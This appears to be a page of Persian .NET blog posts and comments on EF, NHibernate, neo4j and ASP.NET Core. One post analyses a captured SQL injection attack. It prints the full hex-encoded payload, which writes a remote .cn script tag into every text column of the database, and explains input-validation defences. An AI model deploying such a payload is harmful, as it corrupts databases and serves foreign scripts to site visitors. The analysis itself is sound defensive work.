وحید نصیری وحید نصیری
نظرات مطالب
متدهای کمکی مفید در پروژه های asp.net mvc
- من برای تست از EF 4.3.1.0 استفاده کردم و به نظر این محدودیت رو حداقل با select و projection ندارد و برنامه بدون مشکل اجرا شد.
- برای نگارش‌های قبل از آن این روش جواب می‌دهد:
 db.table.Where(...)
         .Select(p =>
                     new
                     {
                        p.Date1,
                        p.Comment,
                        p.Cost,
                        p.UserId,
                      })
                   .AsEnumerable() // مهم
                   .Select(...در اینجا مجاز هستید از هر نوع تابعی استفاده کنید..)
                   .ToList();

‫۱۲ سال و ۳ ماه قبل، سه‌شنبه ۱۷ مرداد ۱۳۹۱، ساعت ۰۴:۲۱
محسن خان محسن خان
نظرات مطالب
گرفتن خروجی XML از جداول در SQL Server 2012

- می‌تونی با کدنویسی اینکار رو انجام بدی:

var reportData = new DataSet();
reportData.ReadXml("yourfile.xml");
var connection = new SqlConnection("DB ConnectionSTring");
var sbc = new SqlBulkCopy(connection);
sbc.DestinationTableName = "yourXMLTable";
- یا می‌تونی از import و export خود SQL Server استفاده کنی.
- و یا از OPENXML میشه استفاده کرد:
 
INSERT Customers 
SELECT * 
FROM OPENXML ...
‫۱۰ سال و ۱۱ ماه قبل، دوشنبه ۱۸ آذر ۱۳۹۲، ساعت ۰۴:۲۹
وحید نصیری وحید نصیری
نظرات مطالب
بررسی روش مشاهده خروجی SQL حاصل از کوئری‌های Entity framework Core
یک نکته‌ی تکمیلی: روش مشاهده‌ی مقدار پارامترها در لاگ‌های SQL
در حالت معمولی، خروجی SQL لاگ شده‌ی توسط EF Core به صورت زیر است:
Microsoft.EntityFrameworkCore.Database.Command[20101] Executed DbCommand (41ms) 
[Parameters=[@__id_0='?' (DbType = Int32)], 
CommandType='Text', CommandTimeout='30']
 SELECT TOP(2) [m].[Id], [m].[Address], [m].[City], [m].[Email], [m].[Name], [m].[Phone], [m].[PostalCode], [m].[State] FROM [Contact] AS [m] WHERE [m].[Id] = @__id_0
برای مشاهده‌ی مقدار پارامترها نیاز است SensitiveDataLogging را فعال کرد:
services.AddDbContext<ContactsContext>(options => { 
  options.UseSqlServer(Configuration["Data:ContactsContext:ConnectionString"]); 
  options.EnableSensitiveDataLogging(); 
});
اینبار خروجی لاگ شده، مقدار پارامترها را نیز به همراه دارد:
Microsoft.EntityFrameworkCore.Database.Command[20100] Executing DbCommand
 [Parameters=[@__id_0='1' (Nullable = true)], 
CommandType='Text', CommandTimeout='30'] 
SELECT TOP(2) [m].[Id], [m].[Address], [m].[City], [m].[Email], [m].[Name], [m].[Phone], [m].[PostalCode], [m].[State] FROM [Contact] AS [m] WHERE [m].[Id] = @__id_0
‫۵ سال و ۷ ماه قبل، دوشنبه ۲۰ اسفند ۱۳۹۷، ساعت ۱۱:۵۳
وحید نصیری وحید نصیری
نظرات مطالب
شرح حال ابزارهای گزارشگیری موجود
لبته این iTextSharp فقط یک Pdf Writer‌ خام هست. برای گزارشگیری و گزارش سازی ابزاری رو نداره ولی ... میشه برفراز آن خیلی کارها رو میسر کرد.
من منهای طراح گرافیکی DevExpress XtraReports که ذکر کردید، مابقی امکاناتش رو تا الان با iTextSharp پیاده سازی کردم. به نظرم نیازی هم به طراح ندارد. روش Code first هست. البته فقط خروجی PDF‌ داره. با پشتیبانی کامل فارسی و راست به چپ. اصلا برای راست به چپ درستش کردم!
این یک نمونه خروجی Dynamic crosstab ایی است که چند وقت قبل در اینجا (^) در موردش توضیح دادم. فکر نمی‌کنم هیچکدوم از ابزارهای موجود بتونند از یک کوئری LINQ و اون هم Dynamic یک خروجی به این شکل رو تولید کنند : (^)
‫۱۲ سال و ۱۱ ماه قبل، یکشنبه ۱۳ آذر ۱۳۹۰، ساعت ۱۷:۳۴
علی ملکیان علی ملکیان
نظرات مطالب
بازنویسی سطح دوم کش برای Entity framework 6
آقای نصیری من برای صفحه بندی اطلاعات به این صورت کش میکنم اطلاعات رو :

            var source = users
                .Include(d => d.RolesGroup)
                .Skip(skipRecords)
                .Take(recordsPerPage)
                .Cacheable()
                .ToList();

درست عمل میکنه و فقط بار اول به دیتابیس متصل میشه ولی زمانی که یک رکورد رو حذف میکنم و متد SaveAllChanges رو هم صدا میزنم changedEntityNames همیشه خالی برگشت داده میشه.

من به این صورت رکوردی رو حذف میکنم :

 
 public async Task<IdentityResult> RemoveByIdAsync(int userId)
        {
            var user = FindById(userId);
            var identityResult = await DeleteAsync(user);
            return identityResult;
        }

به نظرتون مشکل از کجاست ؟
‫۸ سال و ۱۰ ماه قبل، پنجشنبه ۳ دی ۱۳۹۴، ساعت ۲۳:۱۸
وحید نصیری وحید نصیری
نظرات مطالب
فعال سازی سطح دوم کش در Fluent NHibernate
سلام،

کلا سطح دوم کش در NH بر اساس 4 مکانیزم در طول یک سشن فکتوری عمل می‌کند:
- کش مربوط به موجودیت‌ها (entities cache) که بر اساس متد session.Get یا Load فعال می‌شود
و همچنین Collections cache (متدهای List و Enumerable)
- کش مربوط به کوئری‌ها (queries cache) با اعمال متد Cacheable به کوئری مورد نظر.
- timestamp cache که به معنای آخرین زمان نوشتن در یک جدول می‌باشد (و این timestamp فقط و فقط بر اساس وجود تراکنش‌ها عمل می‌کند). به این ترتیب در زمان insert/update/delete به صورت خودکار کش موجود منقضی اعلام می‌شود تا اطلاعات قدیمی به کاربر تحویل داده نشود و کش سطح دوم جهت کوئری‌های بعدی بازسازی خواهد شد.

و در مثال شما:
- در کوئری دوم هم باید متد Cacheable ذکر شود اگر نشود به صورت متداول با آن برخورد خواهد شد.
- زمانیکه از متد Cacheable استفاده می‌شود، حالت queries cache فعال می‌شود. چون در مثال شما دو کوئری مختلف داریم، پس به کش مربوط به کوئری اول مراجعه نخواهد شد. این کوئری کش، با تغییر مقادیر پارامترهای یک کوئری هم مجددا به روز می‌شود. (این حالت برای کوئر‌ی‌هایی که با پارامترهای یکسان به طور متناوب فراخوانی می‌شوند، بسیار مناسب است)
- سطح دوم کش فقط پس از commit یک تراکنش معنا پیدا می‌کند. بنابراین اگر جهت آزمایش داخل یک تراکنش، پشت سر هم کوئری‌ها را نوشته‌اید ... در این لحظه از سطح دوم کش بی‌بهره خواهید بود (فقط سطح اول کش فعال است) و کوئری‌های پس از پایان تراکنش جاری، از نتیجه کش آن می‌توانند استفاده کنند.
- در مورد کش مربوط به موجودیت‌ها و تفاوت آن با کش کوئری‌ها در بالا صحبت شد (شما در یک جا کش کوئری را فعال کرده‌اید در جای دیگر کش entities را طلب می‌کنید که نمی‌شود).
‫۱۳ سال و ۷ ماه قبل، دوشنبه ۱۲ اردیبهشت ۱۳۹۰، ساعت ۰۰:۵۸
وحید نصیری وحید نصیری
مطالب
حمله چینی‌ها به سایت‌های ایرانی !


چند روز پیش داشتم لاگ‌های خطای یکی از سایت‌هایی رو که درست کرده‌ام بررسی می‌کردم، متوجه حجم بالای فایل لاگ خطای آن شدم (در چند سایت مختلف این مورد مشابه را دیدم). پس از بررسی، مورد زیر بسیار جالب بود:

Log Entry :

Error Raw Url :/show.aspx?id=15;DECLARE%20@S%20CHAR(4000);SET%20@S=
CAST(0x4445434C415245204054207661726368617228323535292C404
32076617263686172283430303029204445434C415245205461626C655F4375727
36F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616
D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220
776865726520612E69643D622E696420616E6420612E78747970653D27752720616E
642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78
747970653D323331206F7220622E78747970653D31363729204F50454E205461626C65
5F437572736F72204645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3
02920424547494E20657865632827757064617465205B272B40542B275D20736574205B
272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E
3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B4
0432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742073
72633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6
A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20
205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461
626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

IP=120.129.71.187

vahidnasiri.blogspot.com


خوب این چی هست؟!
قبل از اینکه با اجرای عبارت SQL فوق به صورت تستی و محض کنجکاوی، کل دیتابیس جاری (SQL server) را آلوده کنیم می‌شود تنها قسمت cast آنرا مورد بررسی قرار داد. برای مثال به صورت زیر:
print CAST(0x444... AS CHAR(4000))

خروجی، عبارت زیر خواهد بود که به صورت استادانه‌ای مخفی شده است:

DECLARE @T varchar(255),

@C varchar(4000)

DECLARE Table_Cursor CURSOR

FOR

SELECT a.name,

b.name

FROM sysobjects a,

syscolumns b

WHERE a.id = b.id

AND a.xtype = 'u'

AND (

b.xtype = 99

OR b.xtype = 35

OR b.xtype = 231

OR b.xtype = 167

)

OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C

.....

عبارت T-SQL فوق، تمامی فیلدهای متنی (varchar ، char ، text و امثال آن) کلیه جداول دیتابیس جاری را پیدا کرده و به آن‌ها اسکریپتی را اضافه می‌کند. (آدرس‌های فوق وجود ندارد و بنابراین ارجاع آن صرفا سبب کندی شدید باز شدن صفحات سایت خواهد شد بدون اینکه نمایش ظاهری خاصی را مشاهده نمائید)

این حمله اس کیوال موفق نبود. علت؟
اگر به آدرس بالا دقت کنید آدرس صفحه به show.aspx?id=15 ختم می‌شود. برای مثال نمایش خبر شماره 15 در سایت. در اینجا، هدف، دریافت یک عدد صحیح از طریق query string است و نه هیچ چیز دیگری. بنابراین قبل از انجام هر کاری و تنها با بررسی نوع داده دریافتی، این نوع حملات عقیم خواهند شد. (برای مثال بکارگیری ...int.Parse(Request) در صورت عدم دریافت یک متغیر عددی، سبب ایجاد یک exception شده و برنامه در همین نقطه متوقف می‌شود)


IP های زیر حمله بالا رو انجام دادند:
IP=61.153.33.106
IP=211.207.124.182
IP=59.63.97.18
IP=117.88.137.174
IP=58.19.130.130
IP=121.227.61.188
IP=125.186.252.99
IP=218.79.55.50
IP=125.115.2.4
IP=221.11.190.75
IP=120.129.71.187
IP=221.205.71.199
IP=59.63.97.18
IP=121.227.61.188

این آی پی‌ها یا چینی هستند یا کره‌ای و البته الزامی هم ندارد که حتما متعلق به این کشورها باشند (استفاده از پروکسی توسط یک "هم‌وطن" برای مثال).

حالا شاید سؤال بپرسید که چرا از این اعداد هگز استفاده کرده‌اند؟ چرا مستقیما عبارت sql را وارد نکرده‌اند؟
همیشه ورودی ما از یک کوئری استرینگ عدد نخواهد بود (بسته به طراحی برنامه). در این موارد بررسی اعتبار کوئری استرینگ وارد شده بسیار مشکل می‌شود. برای مثال می‌شود تابعی طراحی کرد که اگر در مقدار دریافتی از کوئری استرینگ، select یا insert یا update و امثال آن وجود داشت، به صورت خودکار آنها را حذف کند. اما استفاده از cast فوق توسط فرد مهاجم، عملا این نوع روش‌ها را ناکارآمد خواهد کرد. برای مقابله با این حملات اولین اصلی را که باید به‌خاطر داشت این است: به کاربر اجازه انشاء نوشتن ندهید! اگر قرار است طول رشته دریافتی مثلا 32 کاراکتر باشد، او حق ندارد بیشتر از این مقداری را وارد نماید (به طول بیش از اندازه رشته وارد شده فوق دقت نمائید).
و موارد دیگری از این دست (شامل تنظیمات IIS ، روش‌های صحیح استفاده از ADO.NET برای مقابله با این نوع حملات و غیره) که خلاصه آن‌ها را در کتاب فارسی زیر می‌توانید پیدا کنید:
http://naghoos-andisheh.ir/product_info.php?products_id=197


‫۱۵ سال و ۱۳ ماه قبل، یکشنبه ۵ آبان ۱۳۸۷، ساعت ۱۹:۳۷
ناصرنیازی ناصرنیازی
مطالب
مروری سریع بر neo4j
neo4j  یک بانک اطلاعاتی گراف پایه است که جزو بانک‌های اطلاعاتی no-sql طبقه بندی می‌شود. سرعت بسیار بالا و امکان اجرای کوئری‌های پیچیده، از برجسته‌ترین ویژگی‌های این بانک اطلاعاتی است. 
بهترین کاربرد neo4j  استفاده به عنوان مکمل برای بانک اطلاعاتی‌های دیگر مثل مونگو و کاساندرا است؛ به این صورت که دیتای اصلی در دیتابیس مونگو یا کاساندرا ذخیره گردد و ایندکس این دیتا‌ها به همراه چند پارامتر کلیدی که در کوئری‌ها استفاده زیادی دارد در neo4j ذخیره گردد. اکثر کوئری‌ها بر روی neo4j اجرا شوند و با استفاده از کلید‌های یافته شده، دیتای اصلی از بانک اطلاعاتی اصلی دریافت شود. این روش در پروژه‌های بسیار بزرگ (مثل شبکه‌های اجتماعی) کاربرد فراوانی دارد. همین شیوه برای استفاده از ElasticSearch نیز بسیار مرسوم است. 
برای آموزش نصب neo4j در ویندوز، از این لینک و در لینوکس از این لینک استفاده کنید.
برای کار با neo4j آدرس http://127.0.0.1:7474 را درمرورگر وارد کنید و سپس وارد ویرایشگر کوئری شوید. برای بار اول، neo4j از شما نام کاربری و رمز عبوری را درخواست می‌کند. این نام و رمز عبور، هنگام نصب تعیین می‌شود. معمولآ نام کاربری آن neo4j  است. 


در زیر برخی دستورات ابتدایی آن آورده شده است. 
ایجاد یک آبجکت و یا ویرایش آن
برای ساخت یک آبجکت و یا ویرایش آن، باید از فرم کوئری زیر استفاده کنیم. این مرحله معادل ساخت جدول در بانک‌های اطلاعاتی رابطه‌ای است. 
CREATE  (VariableName:objectType { guid: {keyInMainDB }, property1 :value1 ,property2 : value2 ,... )

فرم زیر، هم برای ایجاد کاربرد دارد و هم برای ویرایش. چون این فرم هر دو حالت را باهم پوشش می‌دهد، بیشتر استفاده می‌شود. هر چند در مواقعی که می‌خواهیم تعداد زیادی دیتا وارد بانک کنیم، حالت قبل سرعت بالاتری دارد. 
MERGE (VariableName:objectType { guid: keyInMainDB }) SET VariableName +={property1: value1,property2: value2,...}
مثال واقعی: 
MERGE (object:User { guid: 1353554 }) SET object +={username:"nasser" ,time_created: 1522480294 }
در مثال بالا یک آبجکت با نوع یوزر را ایجاد کردیم. با اینکار در واقع تایپ یوزر را هم به neo4j معرفی کردیم. البته هر اسمی را می‌توانیم جای یوزر بگذاریم. 
مقادیر عددی مستقیم، و موارد رشته‌ای با کوتیشن به خواص نسبت داده شدند‌. اسم خواص را هم ما انتخاب کردیم. علاوه بر عدد و رشته، neo4j از آرایه هم به عنوان نوع داده ورودی پشتیبانی می‌کند. 

بازیابی یک آبجکت 
برای بازیابی یک آبجکت، از فرم ساده زیر استفاده می‌شود: 
match (VariableName:objectType ) return VariableName 
برای بازیابی آبجکتی که در بالا درج شد، از مثال واقعی زیر استفاده می‌کنیم:
match (object:User { guid: 1353554 }) return object
می‌توانیم برای بازیابی شرط هم تعیین کنیم:
match (object:User ) where object.time_created>1522480293  return object

ایجاد رابطه بین دو شیء 
برای ایجاد رابطه بین دو شیء، از فرم زیر استفاده می‌کنیم: 
MATCH (v1:objectType1 {guid: guid1}),
(v2:objectType2  {guid: guid2})  
MERGE (v1)-[:RelationshipName]->(v2)
برای مثال واقعی می‌توانید حالتی را در نظر بگیرید که یک کاربر، کاربر دیگری را در شبکه اجتماعی دنبال می‌کند. در اینجا رابطه دنبال کردن بین دو کاربر ایجاد می‌شود. یا حالتی که یک فرد، یک متن یا تصویر را لایک می‌کند، در اینجا بین آبجکت کاربر و آن آبجکت متن یا تصویر، رابطه لایک کردن ایجاد می‌شود. 
مثال واقعی برای لایک کردن: 
MATCH (usr:User {guid: 1353554  }),(img:Image  {guid: 88554  }) 
MERGE (usr)-[:LIKE]->(img)
اسم LIKE را ما بر روی این رابطه گذاشتیم و البته هر اسم دیگری را نیز می‌توانستیم بگذاریم و الزامی هم برای نوشتن با حروف بزرگ نبود. فقط برای راحت‌تر تفکیک کردن از سایر نوع آبجکت‌ها، این اسم را با حرف بزرگ نوشتیم . 
برای بازیابی کاربرهایی که مواردی را  لایک کرده‌اند از فرم زیر استفاده می‌کنیم: 
MATCH (usr:User)-[r:LIKE]-() Return usr
برای بازیابی همه مواردی که لایک شده‌اند: 
MATCH ()-[r:LIKE]-(n) Return n
برای بازیابی همه مواردی که یک یوزر خاص لایک کرده‌است: 
MATCH (usr:User{guid:1353554 })-[r:LIKE]-(n) Return n
برای بازیابی دو طرفی که در رابطه LIKE شرکت داشته‌اند، از فرم زیر استفاده می‌کنیم:
MATCH p=()-[r:LIKE]->() RETURN p
می‌توانید قسمت شرط را هم اضافه کنید و برای مثال همه کاربرانی را که از یک تاریخ خاص ایجاد شده‌اند و چیزی را لایک کرده‌اند، بدست بیاورید:
MATCH (usr:User )-[r:LIKE]-(n) where usr.time_created>1522480293  Return usr

‫۶ سال و ۶ ماه قبل، شنبه ۱۱ فروردین ۱۳۹۷، ساعت ۱۷:۵۵
وحید نصیری وحید نصیری
مطالب
خواندنی‌های 29 مرداد

اس کیوال سرور

الگوهای طراحی برنامه نویسی شیءگرا

توسعه وب

دات نت فریم ورک

دبلیو پی اف و سیلور لایت

سی و مشتقات

متفرقه

محیط‌های مجتمع توسعه

مرورگرها

پی اچ پی

‫۱۵ سال و ۳ ماه قبل، پنجشنبه ۲۹ مرداد ۱۳۸۸، ساعت ۰۶:۱۱
وحید نصیری وحید نصیری
نظرات مطالب
ارتقاء به ASP.NET Core 1.0 - قسمت 6 - سرویس‌ها و تزریق وابستگی‌ها
یک نکته‌ی تکمیلی:  تزریق وابستگی‌ها در حالتی‌که از یک اینترفیس چندین کلاس مشتق شده‌اند

نمونه‌ی این نکته را پیشتر با Structure Map ملاحظه کرده بودید. پیاده سازی آن با امکانات توکار تزریق وابستگی‌های NET Core. یا بر اساس روش Factory است که در نکته‌ی قبل ملاحظه می‌کنید و یا اگر از یک اینترفیس چندین پیاده سازی در برنامه وجود داشته باشند و ارتباطات آن‌ها در ابتدای کار برنامه به سیستم توکار تزریق وابستگی‌های NET Core. معرفی شده باشند، فقط کافی است یک <IEnumerable<IMultiple را به سازنده‌ی کلاس سرویس استفاده کننده تزریق کنیم:
private readonly IEnumerable<IMultiple> _services;

public HomeController (IEnumerable<IMultiple> services) 
{
     _services = services;
}
این IEnumerable لیست تمام وهله‌های از این نوع را در اختیار سرویس جاری قرار می‌دهد. در این حالت دیگر نیازی به استفاده از factoryها نیست.

مرحله‌ی بعد، تشخیص و یا انتخاب یک پیاده سازی خاص است. الان لیستی از وهله‌های تزریق شده را در اختیار داریم؛ اما می‌خواهیم فقط از یکی از آن‌ها استفاده کنیم:
الف) انتخاب سرویس مدنظر بر اساس نوع کلاسی خاص
 var serviceA = services.First(o => o.GetType() == typeof(ImplementationOne));
ب) نامدار کردن وهله‌ی مدنظر
این روشی است که برای مثال در Structure Map هم استفاده می‌شود (تحت عنوان named instances). یک خاصیت Name را به اینترفیسی که چندین پیاده سازی دارد، اضافه کنید. سپس بر اساس این Name کوئری بگیرید:
 var serviceB = services.First(o => o.Name.Equals("MyClassName"));
‫۶ سال و ۳ ماه قبل، شنبه ۳۰ تیر ۱۳۹۷، ساعت ۱۳:۵۷